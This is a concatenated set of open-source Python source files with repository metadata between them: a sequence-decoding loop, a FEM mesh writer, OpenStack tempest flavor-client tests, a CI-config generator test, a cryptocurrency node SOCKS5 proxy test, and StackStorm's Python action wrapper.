encoder_out = model.encoder(sample['net_input']['src_tokens'], src_lengths=sample['net_input']['src_lengths'])
prev_output_tokens = torch.zeros(bsz, 1).long().fill_(self.bos).to(device)
# prev_output_tokens = torch.zeros(bsz, 1).long().fill_(self.eos).to(device)
dec_preds = []
# 2. generate
from collections import OrderedDict
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = OrderedDict()
full_context_alignment: bool = False
alignment_layer: Optional[int] = None
alignment_heads: Optional[int] = None
for j in range(max_len + 1):
# incremental_state['step'] = j
decoder_outputs, attns = model.decoder(prev_output_tokens, encoder_out=encoder_out, \
incremental_state=incremental_state)
prediction = decoder_outputs.squeeze(1)
prediction = prediction.log_softmax(dim=1)
sample_max = True
if sample_max:
sample_logprobs, predicted = torch.max(prediction, dim=-1, keepdim=True)
else:
predicted = torch.multinomial(prediction, 1) # .to(device)
dec_preds.append(predicted.squeeze(1).clone())
prev_output_tokens = torch.cat((prev_output_tokens, predicted), dim=-1)
dec_preds = torch.stack(dec_preds, dim=1)
predictions = []
for pred in dec_preds.tolist():
predictions.append([{'tokens': torch.Tensor(pred).type_as(dec_preds)}])
return predictions
| 40.042553 | 118 | 0.613355 |
795afee0ea7eb79a7f70753fe3da8eea5d3a87cc | 5,510 | py | Python | femio/formats/ucd/write_ucd.py | yellowshippo/femio | dde277136a8a1b2513afa85ae2fb8707858aa04a | [
"Apache-2.0"
] | 1 | 2021-05-25T16:29:09.000Z | 2021-05-25T16:29:09.000Z | femio/formats/ucd/write_ucd.py | yellowshippo/femio | dde277136a8a1b2513afa85ae2fb8707858aa04a | [
"Apache-2.0"
] | null | null | null | femio/formats/ucd/write_ucd.py | yellowshippo/femio | dde277136a8a1b2513afa85ae2fb8707858aa04a | [
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
class UCDWriter():
def __init__(self, fem_data):
self.fem_data = fem_data
def write(self, file_name=None, *, overwrite=False):
"""Write FEM data in inp format.
Args:
fem_data: FEMData object to be output.
file_name: File name of the output file. If not fed,
input_filename.out.ext will be the output file name.
overwrite: Bool, if True, allow averwrite files (Default: False.)
"""
n_node = len(self.fem_data.nodes.ids)
n_element = len(self.fem_data.elements.ids)
# NOTE: So far write only non time series data whose shape == 2
nodal_data_dict_2d = {
key: value
for key, value in self.fem_data.nodal_data.items()
if len(value.data.shape) == 2
and self._extract_dtype(value.data) != np.dtype('O')}
nodal_data_dimensions = [
v.data.shape[1] for v in nodal_data_dict_2d.values()]
elemental_data_dict_2d = self._convert_objectdict2arraydict(
self.fem_data.elemental_data)
elemental_data_dimensions = [
v.data.shape[1] for v in elemental_data_dict_2d.values()]
with open(file_name, 'w') as f:
# Header
f.write(
f"{n_node} {n_element} {int(np.sum(nodal_data_dimensions))}"
f" {int(np.sum(elemental_data_dimensions))} 0\n")
# Node
f.write(pd.DataFrame(
index=self.fem_data.nodes.ids, data=self.fem_data.nodes.data
).to_csv(sep=' ', header=False, na_rep='NaN'))
# Element
for element_type in self.fem_data.elements.ELEMENT_TYPES:
if element_type not in self.fem_data.elements:
continue
element = self.fem_data.elements[element_type]
n_element = len(element.ids)
first_element, first_element_type = \
self._extract_first_order_element(element, element_type)
f.write(pd.DataFrame(
index=element.ids,
data=np.concatenate([
np.ones([n_element, 1], dtype=int),
np.array([[first_element_type] * n_element]).T,
first_element
], axis=1)
).to_csv(sep=' ', header=False, na_rep='NaN'))
# Nodal data
n_nodal_data = len(nodal_data_dict_2d)
if n_nodal_data > 0:
f.write(f"{n_nodal_data} " + ' '.join(
str(d) for d in nodal_data_dimensions) + '\n')
f.write(
'\n'.join(
f"{k}, unit_unknown" for k
in nodal_data_dict_2d.keys()) + '\n')
f.write(pd.DataFrame(
index=self.fem_data.nodes.ids,
data=np.concatenate([
v.data for v
in nodal_data_dict_2d.values()], axis=1)
).to_csv(sep=' ', header=False, na_rep='NaN'))
# Elemental data
n_elemental_data = len(elemental_data_dict_2d)
if len(elemental_data_dict_2d) > 0:
f.write(f"{n_elemental_data} " + ' '.join(
str(d) for d in elemental_data_dimensions) + '\n')
f.write(
'\n'.join(
f"{k}, unit_unknown" for k
in elemental_data_dict_2d.keys()) + '\n')
f.write(pd.DataFrame(
index=self.fem_data.elements.ids,
data=np.concatenate([
v.data for v
in elemental_data_dict_2d.values()
if len(v.data.shape) == 2], axis=1)
).to_csv(sep=' ', header=False, na_rep='NaN'))
return file_name
def _convert_objectdict2arraydict(self, object_dict):
return_dict = {}
for key, value in object_dict.items():
converted_value = self._convert_object2array(value.data)
if len(converted_value.shape) == 2:
return_dict.update({key: converted_value})
return return_dict
def _convert_object2array(self, objectarray):
if objectarray.dtype != np.dtype('O'):
return objectarray
if hasattr(objectarray[0, 0], 'dtype'):
original_dtype = objectarray[0, 0].dtype
else:
return objectarray
row, col = objectarray.shape
feature = objectarray[0, 0]
stripped = np.stack([
d.astype(original_dtype) for d in np.ravel(objectarray)])
if len(feature.shape) == 0:
return np.reshape(stripped, (row, col))
else:
return np.reshape(stripped, [row, col] + list(feature.shape))
def _extract_dtype(self, array):
if hasattr(array, 'dtype'):
dtype = array.dtype
else:
dtype = type(array)
return dtype
def _extract_first_order_element(self, element, element_type):
if element_type[-1] != '2':
return element.data, element_type
else:
if element_type == 'tet2':
element = element.data[:, :4]
else:
raise ValueError(
f"Unknown element type: {element_type}")
return element, element_type[:-1]
| 38.531469 | 77 | 0.53049 |
795aff74465344c510292aec5f6ff64d6ea91df4 | 9,608 | py | Python | tempest/tests/lib/services/compute/test_flavors_client.py | paulaCrismaru/lis-tempest | 4f142db3967971ee42c4fcff01be363bbdc4bc54 | [
"Apache-2.0"
] | 3 | 2016-07-15T12:27:23.000Z | 2021-04-23T04:41:10.000Z | tempest/tests/lib/services/compute/test_flavors_client.py | LIS/lis-tempest | 8e6403b2d6de81c5d18ed867b4977385c8278b75 | [
"Apache-2.0"
] | null | null | null | tempest/tests/lib/services/compute/test_flavors_client.py | LIS/lis-tempest | 8e6403b2d6de81c5d18ed867b4977385c8278b75 | [
"Apache-2.0"
] | 12 | 2016-07-14T18:13:05.000Z | 2017-07-08T18:45:42.000Z | # Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.lib.services.compute import flavors_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestFlavorsClient(base.BaseComputeServiceTest):
FAKE_FLAVOR = {
"disk": 1,
"id": "1",
"links": [{
"href": "http://openstack.example.com/v2/openstack/flavors/1",
"rel": "self"}, {
"href": "http://openstack.example.com/openstack/flavors/1",
"rel": "bookmark"}],
"name": "m1.tiny",
"ram": 512,
"swap": 1,
"vcpus": 1
}
EXTRA_SPECS = {"extra_specs": {
"key1": "value1",
"key2": "value2"}
}
FAKE_FLAVOR_ACCESS = {
"flavor_id": "10",
"tenant_id": "1a951d988e264818afe520e78697dcbf"
}
def setUp(self):
super(TestFlavorsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.client = flavors_client.FlavorsClient(fake_auth,
'compute', 'regionOne')
def _test_list_flavors(self, bytes_body=False):
flavor = copy.deepcopy(TestFlavorsClient.FAKE_FLAVOR)
# Remove extra attributes
for attribute in ('disk', 'vcpus', 'ram', 'swap'):
del flavor[attribute]
expected = {'flavors': [flavor]}
self.check_service_client_function(
self.client.list_flavors,
'tempest.lib.common.rest_client.RestClient.get',
expected,
bytes_body)
def test_list_flavors_str_body(self):
self._test_list_flavors(bytes_body=False)
def test_list_flavors_byte_body(self):
self._test_list_flavors(bytes_body=True)
def _test_show_flavor(self, bytes_body=False):
expected = {"flavor": TestFlavorsClient.FAKE_FLAVOR}
self.check_service_client_function(
self.client.show_flavor,
'tempest.lib.common.rest_client.RestClient.get',
expected,
bytes_body,
flavor_id='fake-id')
def test_show_flavor_str_body(self):
self._test_show_flavor(bytes_body=False)
def test_show_flavor_byte_body(self):
self._test_show_flavor(bytes_body=True)
def _test_create_flavor(self, bytes_body=False):
expected = {"flavor": TestFlavorsClient.FAKE_FLAVOR}
request = copy.deepcopy(TestFlavorsClient.FAKE_FLAVOR)
# The 'links' parameter should not be passed in
del request['links']
self.check_service_client_function(
self.client.create_flavor,
'tempest.lib.common.rest_client.RestClient.post',
expected,
bytes_body,
**request)
def test_create_flavor_str_body(self):
self._test_create_flavor(bytes_body=False)
def test_create_flavor__byte_body(self):
self._test_create_flavor(bytes_body=True)
def test_delete_flavor(self):
self.check_service_client_function(
self.client.delete_flavor,
'tempest.lib.common.rest_client.RestClient.delete',
{}, status=202, flavor_id='c782b7a9-33cd-45f0-b795-7f87f456408b')
def _test_is_resource_deleted(self, flavor_id, is_deleted=True,
bytes_body=False):
body = json.dumps({'flavors': [TestFlavorsClient.FAKE_FLAVOR]})
if bytes_body:
body = body.encode('utf-8')
response = (httplib2.Response({'status': 200}), body)
self.useFixture(mockpatch.Patch(
'tempest.lib.common.rest_client.RestClient.get',
return_value=response))
self.assertEqual(is_deleted,
self.client.is_resource_deleted(flavor_id))
def test_is_resource_deleted_true_str_body(self):
self._test_is_resource_deleted('2', bytes_body=False)
def test_is_resource_deleted_true_byte_body(self):
self._test_is_resource_deleted('2', bytes_body=True)
def test_is_resource_deleted_false_str_body(self):
self._test_is_resource_deleted('1', is_deleted=False, bytes_body=False)
def test_is_resource_deleted_false_byte_body(self):
self._test_is_resource_deleted('1', is_deleted=False, bytes_body=True)
def _test_set_flavor_extra_spec(self, bytes_body=False):
self.check_service_client_function(
self.client.set_flavor_extra_spec,
'tempest.lib.common.rest_client.RestClient.post',
TestFlavorsClient.EXTRA_SPECS,
bytes_body,
flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
**TestFlavorsClient.EXTRA_SPECS)
def test_set_flavor_extra_spec_str_body(self):
self._test_set_flavor_extra_spec(bytes_body=False)
def test_set_flavor_extra_spec_byte_body(self):
self._test_set_flavor_extra_spec(bytes_body=True)
def _test_list_flavor_extra_specs(self, bytes_body=False):
self.check_service_client_function(
self.client.list_flavor_extra_specs,
'tempest.lib.common.rest_client.RestClient.get',
TestFlavorsClient.EXTRA_SPECS,
bytes_body,
flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6')
def test_list_flavor_extra_specs_str_body(self):
self._test_list_flavor_extra_specs(bytes_body=False)
def test_list_flavor_extra_specs__byte_body(self):
self._test_list_flavor_extra_specs(bytes_body=True)
def _test_show_flavor_extra_spec(self, bytes_body=False):
expected = {"key": "value"}
self.check_service_client_function(
self.client.show_flavor_extra_spec,
'tempest.lib.common.rest_client.RestClient.get',
expected,
bytes_body,
flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
key='key')
def test_show_flavor_extra_spec_str_body(self):
self._test_show_flavor_extra_spec(bytes_body=False)
def test_show_flavor_extra_spec__byte_body(self):
self._test_show_flavor_extra_spec(bytes_body=True)
def _test_update_flavor_extra_spec(self, bytes_body=False):
expected = {"key1": "value"}
self.check_service_client_function(
self.client.update_flavor_extra_spec,
'tempest.lib.common.rest_client.RestClient.put',
expected,
bytes_body,
flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
key='key1', **expected)
def test_update_flavor_extra_spec_str_body(self):
self._test_update_flavor_extra_spec(bytes_body=False)
def test_update_flavor_extra_spec_byte_body(self):
self._test_update_flavor_extra_spec(bytes_body=True)
def test_unset_flavor_extra_spec(self):
self.check_service_client_function(
self.client.unset_flavor_extra_spec,
'tempest.lib.common.rest_client.RestClient.delete', {},
flavor_id='c782b7a9-33cd-45f0-b795-7f87f456408b', key='key')
def _test_list_flavor_access(self, bytes_body=False):
expected = {'flavor_access': [TestFlavorsClient.FAKE_FLAVOR_ACCESS]}
self.check_service_client_function(
self.client.list_flavor_access,
'tempest.lib.common.rest_client.RestClient.get',
expected,
bytes_body,
flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6')
def test_list_flavor_access_str_body(self):
self._test_list_flavor_access(bytes_body=False)
def test_list_flavor_access_byte_body(self):
self._test_list_flavor_access(bytes_body=True)
def _test_add_flavor_access(self, bytes_body=False):
expected = {
"flavor_access": [TestFlavorsClient.FAKE_FLAVOR_ACCESS]
}
self.check_service_client_function(
self.client.add_flavor_access,
'tempest.lib.common.rest_client.RestClient.post',
expected,
bytes_body,
flavor_id='8c7aae5a-d315-4216-875b-ed9b6a5bcfc6',
tenant_id='1a951d988e264818afe520e78697dcbf')
def test_add_flavor_access_str_body(self):
self._test_add_flavor_access(bytes_body=False)
def test_add_flavor_access_byte_body(self):
self._test_add_flavor_access(bytes_body=True)
def _test_remove_flavor_access(self, bytes_body=False):
expected = {
"flavor_access": [TestFlavorsClient.FAKE_FLAVOR_ACCESS]
}
self.check_service_client_function(
self.client.remove_flavor_access,
'tempest.lib.common.rest_client.RestClient.post',
expected,
bytes_body,
flavor_id='10',
tenant_id='a6edd4d66ad04245b5d2d8716ecc91e3')
def test_remove_flavor_access_str_body(self):
self._test_remove_flavor_access(bytes_body=False)
def test_remove_flavor_access_byte_body(self):
self._test_remove_flavor_access(bytes_body=True)
| 37.53125 | 79 | 0.676311 |
795b004abe89692d5d053ce87ef7e19cab0ff783 | 1,121 | py | Python | tests/test_gendottravis.py | andrewrothstein/ansible-galaxy-local-deps | 93711bdfb222bf23ea705edc83d4791b0547f681 | [
"MIT"
] | 2 | 2018-02-13T06:55:55.000Z | 2019-03-25T01:58:33.000Z | tests/test_gendottravis.py | andrewrothstein/ansible-galaxy-local-deps | 93711bdfb222bf23ea705edc83d4791b0547f681 | [
"MIT"
] | 4 | 2017-06-29T14:07:16.000Z | 2019-11-13T13:51:21.000Z | tests/test_gendottravis.py | andrewrothstein/ansible-galaxy-local-deps | 93711bdfb222bf23ea705edc83d4791b0547f681 | [
"MIT"
] | 3 | 2017-05-24T18:06:29.000Z | 2019-11-11T20:20:43.000Z | from unittest import TestCase
from yaml import load, dump
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from ansiblegalaxylocaldeps.gendottravis import extract_osl_from_dottravis, from_dcb_os_yml
class TestGenDotTravis(TestCase):
def test_extract_osl_from_dottravis(self):
y = load("""---
env:
- OS=xyz
- OS=abc
""", Loader=Loader)
osl = extract_osl_from_dottravis(y)
self.assertEqual(len(osl), 2, 'osl length')
self.assertEqual(osl[0], 'abc', 'chopped OS= correctly')
self.assertEqual(osl[1], 'xyz', 'chopped OS= correctly')
def test_from_dcb_os_yml(self):
osl = ['xyz', 'abc']
ci_dist = "bionic"
python_ver = '1.2.3.4'
script_yml = ['run-cmd-1', 'run-cmd-2']
r = from_dcb_os_yml(script_yml, osl, ci_dist, python_ver)
self.assertEqual(r['dist'], ci_dist)
self.assertEqual(r['python'], python_ver)
self.assertEqual(len(r['env']), 2)
self.assertEqual(r['env'][0], 'OS=abc')
self.assertEqual(r['env'][1], 'OS=xyz')
| 33.969697 | 91 | 0.647636 |
795b00cf7c230f716b623ca258fc90bdf658a4bd | 6,098 | py | Python | qa/rpc-tests/proxy_test.py | evsyutkin/core | aae8910a616292ea565cd847fbdca22d8d50ff48 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | evsyutkin/core | aae8910a616292ea565cd847fbdca22d8d50ff48 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | evsyutkin/core | aae8910a616292ea565cd847fbdca22d8d50ff48 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import socket
import traceback, sys
from binascii import hexlify
import time, os
from socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework import BitcoinTestFramework
from util import *
'''
Test plan:
- Start bitcoind's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on bitcoind side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create bitcoinds that connect to them
- Manipulate the bitcoinds using addnode (onetry) an observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
'''
class ProxyTest(BitcoinTestFramework):
def __init__(self):
# Create two proxies on different ports
# ... one unauthenticated
self.conf1 = Socks5Configuration()
self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000))
self.conf1.unauth = True
self.conf1.auth = False
# ... one supporting authenticated and unauthenticated (Tor)
self.conf2 = Socks5Configuration()
self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000))
self.conf2.unauth = True
self.conf2.auth = True
# ... one on IPv6 with similar configuration
self.conf3 = Socks5Configuration()
self.conf3.af = socket.AF_INET6
self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000))
self.conf3.unauth = True
self.conf3.auth = True
self.serv1 = Socks5Server(self.conf1)
self.serv1.start()
self.serv2 = Socks5Server(self.conf2)
self.serv2.start()
self.serv3 = Socks5Server(self.conf3)
self.serv3.start()
def setup_nodes(self):
# Note: proxies are not used to connect to local nodes
# this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
return start_nodes(4, self.options.tmpdir, extra_args=[
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0']
])
def node_test(self, node, proxies, auth):
rv = []
# Test: outgoing IPv4 connection through node
node.addnode("15.61.23.23:1234", "onetry")
cmd = proxies[0].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "15.61.23.23")
assert_equal(cmd.port, 1234)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing IPv6 connection through node
node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
cmd = proxies[1].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534")
assert_equal(cmd.port, 5443)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing onion connection through node
node.addnode("wisprvj7kcklujarx.onion:17000", "onetry")
cmd = proxies[2].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "wisprvj7kcklujarx.onion")
assert_equal(cmd.port, 17000)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing DNS name connection through node
node.addnode("node.noumenon:8333", "onetry")
cmd = proxies[3].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "node.noumenon")
assert_equal(cmd.port, 8333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
return rv
def run_test(self):
# basic -proxy
self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
# -proxy plus -onion
self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
# -proxy plus -onion, -proxyrandomize
rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
# Check that credentials as used for -proxyrandomize connections are unique
credentials = set((x.username,x.password) for x in rv)
assert_equal(len(credentials), 4)
# proxy on IPv6 localhost
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False)
if __name__ == '__main__':
ProxyTest().main()
| 41.767123 | 145 | 0.653001 |
795b0114a85e3b0f7eb9e06d3f29b6d98c871c49 | 14,688 | py | Python | contrib/runners/python_runner/python_runner/python_action_wrapper.py | momokuri-3/st2 | 0a7038723d701b433d7079b843cc76d4bf1ae8c9 | [
"Apache-2.0"
] | 4,920 | 2015-01-01T15:12:17.000Z | 2022-03-31T19:31:15.000Z | contrib/runners/python_runner/python_runner/python_action_wrapper.py | momokuri-3/st2 | 0a7038723d701b433d7079b843cc76d4bf1ae8c9 | [
"Apache-2.0"
] | 3,563 | 2015-01-05T19:02:19.000Z | 2022-03-31T19:23:09.000Z | contrib/runners/python_runner/python_runner/python_action_wrapper.py | momokuri-3/st2 | 0a7038723d701b433d7079b843cc76d4bf1ae8c9 | [
"Apache-2.0"
] | 774 | 2015-01-01T20:41:24.000Z | 2022-03-31T13:25:29.000Z | # Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
# Ignore CryptographyDeprecationWarning warnings which appear on older versions of Python 2.7
import warnings
from cryptography.utils import CryptographyDeprecationWarning
warnings.filterwarnings("ignore", category=CryptographyDeprecationWarning)
import os
import sys
import select
import traceback
import distutils.sysconfig
# NOTE: We intentionally use orjson directly here instead of json_encode - orjson.dumps relies
# on config option which we don't parse for the action wrapper since it speeds things down - action
# wrapper should rely on as little imports as possible to make Python runner executions fast -
# that's very important.
import orjson
# Note: This work-around is required to fix the issue with other Python modules which live
# inside this directory polluting and masking sys.path for Python runner actions.
# Since this module is ran as a Python script inside a subprocess, directory where the script
# lives gets added to sys.path and we don't want that.
# Note: We need to use just the suffix, because full path is different depending if the process
# is ran in virtualenv or not
RUNNERS_PATH_SUFFIX = "st2common/runners"
if __name__ == "__main__":
script_path = sys.path[0]
if RUNNERS_PATH_SUFFIX in script_path:
sys.path.pop(0)
# This puts priority on loading virtualenv library in the pack's action. This is necessary
# for the situation that both st2 and pack require to load same name libraries with different
# version. Without this statement, action may call library method with unexpected dependencies.
sys.path.insert(0, distutils.sysconfig.get_python_lib())
import sys
import argparse
import six
from st2common import log as logging
from st2common import config as st2common_config
from st2common.runners.base_action import Action
from st2common.runners.utils import get_logger_for_python_runner_action
from st2common.runners.utils import get_action_class_instance
from st2common.util import loader as action_loader
from st2common.constants.action import ACTION_OUTPUT_RESULT_DELIMITER
from st2common.constants.keyvalue import SYSTEM_SCOPE
from st2common.constants.runners import PYTHON_RUNNER_INVALID_ACTION_STATUS_EXIT_CODE
from st2common.constants.runners import PYTHON_RUNNER_DEFAULT_LOG_LEVEL
__all__ = ["PythonActionWrapper", "ActionService"]
LOG = logging.getLogger(__name__)
INVALID_STATUS_ERROR_MESSAGE = """
If this is an existing action which returns a tuple with two items, it needs to be updated to
either:
1. Return a list instead of a tuple
2. Return a tuple where a first items is a status flag - (True, ('item1', 'item2'))
For more information, please see: https://docs.stackstorm.com/upgrade_notes.html#st2-v1-6
""".strip()
# How many seconds to wait for stdin input when parameters are passed in via stdin before
# timing out
READ_STDIN_INPUT_TIMEOUT = 2
class ActionService(object):
"""
Instance of this class is passed to the action instance and exposes "public" methods which can
be called by the action.
"""
def __init__(self, action_wrapper):
self._action_wrapper = action_wrapper
self._datastore_service = None
@property
def datastore_service(self):
# Late import to avoid very expensive in-direct import (~1 second) when this function is
# not called / used
from st2common.services.datastore import ActionDatastoreService
if not self._datastore_service:
# Note: We use temporary auth token generated by the container which is valid for the
# duration of the action lifetime
action_name = self._action_wrapper._class_name
log_level = self._action_wrapper._log_level
logger = get_logger_for_python_runner_action(
action_name=action_name, log_level=log_level
)
pack_name = self._action_wrapper._pack
class_name = self._action_wrapper._class_name
auth_token = os.environ.get("ST2_ACTION_AUTH_TOKEN", None)
self._datastore_service = ActionDatastoreService(
logger=logger,
pack_name=pack_name,
class_name=class_name,
auth_token=auth_token,
)
return self._datastore_service
##################################
# General methods
##################################
def get_user_info(self):
return self.datastore_service.get_user_info()
##################################
# Methods for datastore management
##################################
def list_values(self, local=True, prefix=None):
return self.datastore_service.list_values(local=local, prefix=prefix)
def get_value(self, name, local=True, scope=SYSTEM_SCOPE, decrypt=False):
return self.datastore_service.get_value(
name=name, local=local, scope=scope, decrypt=decrypt
)
def set_value(
self, name, value, ttl=None, local=True, scope=SYSTEM_SCOPE, encrypt=False
):
return self.datastore_service.set_value(
name=name, value=value, ttl=ttl, local=local, scope=scope, encrypt=encrypt
)
def delete_value(self, name, local=True, scope=SYSTEM_SCOPE):
return self.datastore_service.delete_value(name=name, local=local, scope=scope)
class PythonActionWrapper(object):
def __init__(
self,
pack,
file_path,
config=None,
parameters=None,
user=None,
parent_args=None,
log_level=PYTHON_RUNNER_DEFAULT_LOG_LEVEL,
):
"""
:param pack: Name of the pack this action belongs to.
:type pack: ``str``
:param file_path: Path to the action module.
:type file_path: ``str``
:param config: Pack config.
:type config: ``dict``
:param parameters: action parameters.
:type parameters: ``dict`` or ``None``
:param user: Name of the user who triggered this action execution.
:type user: ``str``
:param parent_args: Command line arguments passed to the parent process.
:type parse_args: ``list``
"""
self._pack = pack
self._file_path = file_path
self._config = config or {}
self._parameters = parameters or {}
self._user = user
self._parent_args = parent_args or []
self._log_level = log_level
self._class_name = None
self._logger = logging.getLogger("PythonActionWrapper")
try:
st2common_config.parse_args(args=self._parent_args)
except Exception as e:
LOG.debug(
"Failed to parse config using parent args (parent_args=%s): %s"
% (str(self._parent_args), six.text_type(e))
)
# Note: We can only set a default user value if one is not provided after parsing the
# config
if not self._user:
# Note: We use late import to avoid performance overhead
from oslo_config import cfg
self._user = cfg.CONF.system_user.user
def run(self):
action = self._get_action_instance()
output = action.run(**self._parameters)
if isinstance(output, tuple) and len(output) == 2:
# run() method returned status and data - (status, data)
action_status = output[0]
action_result = output[1]
else:
# run() method returned only data, no status (pre StackStorm v1.6)
action_status = None
action_result = output
action_output = {"result": action_result, "status": None}
if action_status is not None and not isinstance(action_status, bool):
sys.stderr.write(
"Status returned from the action run() method must either be "
"True or False, got: %s\n" % (action_status)
)
sys.stderr.write(INVALID_STATUS_ERROR_MESSAGE)
sys.exit(PYTHON_RUNNER_INVALID_ACTION_STATUS_EXIT_CODE)
if action_status is not None and isinstance(action_status, bool):
action_output["status"] = action_status
# Special case if result object is not JSON serializable - aka user wanted to return a
# non-simple type (e.g. class instance or other non-JSON serializable type)
try:
orjson.dumps(action_output["result"])
except (TypeError, orjson.JSONDecodeError):
action_output["result"] = str(action_output["result"])
try:
print_output = orjson.dumps(action_output)
except Exception:
print_output = str(action_output).encode("utf-8")
# Data is bytes so we use sys.stdout.buffer which works with bytes and not sys.stdout
# which works with strings / unicodes.
# This way it also works correctly with unicode sequences.
# Technically we could also write to sys.stdout, but this would require additional
# conversion back and forth
# Print output to stdout so the parent can capture it
sys.stdout.buffer.write(ACTION_OUTPUT_RESULT_DELIMITER.encode("utf-8"))
sys.stdout.buffer.write(print_output + b"\n")
sys.stdout.buffer.write(ACTION_OUTPUT_RESULT_DELIMITER.encode("utf-8"))
sys.stdout.flush()
def _get_action_instance(self):
try:
actions_cls = action_loader.register_plugin(Action, self._file_path)
except Exception as e:
tb_msg = traceback.format_exc()
msg = (
'Failed to load action class from file "%s" (action file most likely doesn\'t '
"exist or contains invalid syntax): %s"
% (self._file_path, six.text_type(e))
)
msg += "\n\n" + tb_msg
exc_cls = type(e)
raise exc_cls(msg)
action_cls = actions_cls[0] if actions_cls and len(actions_cls) > 0 else None
if not action_cls:
raise Exception(
'File "%s" has no action class or the file doesn\'t exist.'
% (self._file_path)
)
# Retrieve name of the action class
# Note - we need to either use cls.__name_ or inspect.getmro(cls)[0].__name__ to
# retrieve a correct name
self._class_name = action_cls.__name__
action_service = ActionService(action_wrapper=self)
action_instance = get_action_class_instance(
action_cls=action_cls, config=self._config, action_service=action_service
)
return action_instance
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Python action runner process wrapper")
parser.add_argument(
"--pack", required=True, help="Name of the pack this action belongs to"
)
parser.add_argument("--file-path", required=True, help="Path to the action module")
parser.add_argument(
"--config", required=False, help="Pack config serialized as JSON"
)
parser.add_argument(
"--parameters", required=False, help="Serialized action parameters"
)
parser.add_argument(
"--stdin-parameters",
required=False,
action="store_true",
help="Serialized action parameters via stdin",
)
parser.add_argument(
"--user", required=False, help="User who triggered the action execution"
)
parser.add_argument(
"--parent-args",
required=False,
help="Command line arguments passed to the parent process serialized as "
" JSON",
)
parser.add_argument(
"--log-level",
required=False,
default=PYTHON_RUNNER_DEFAULT_LOG_LEVEL,
help="Log level for actions",
)
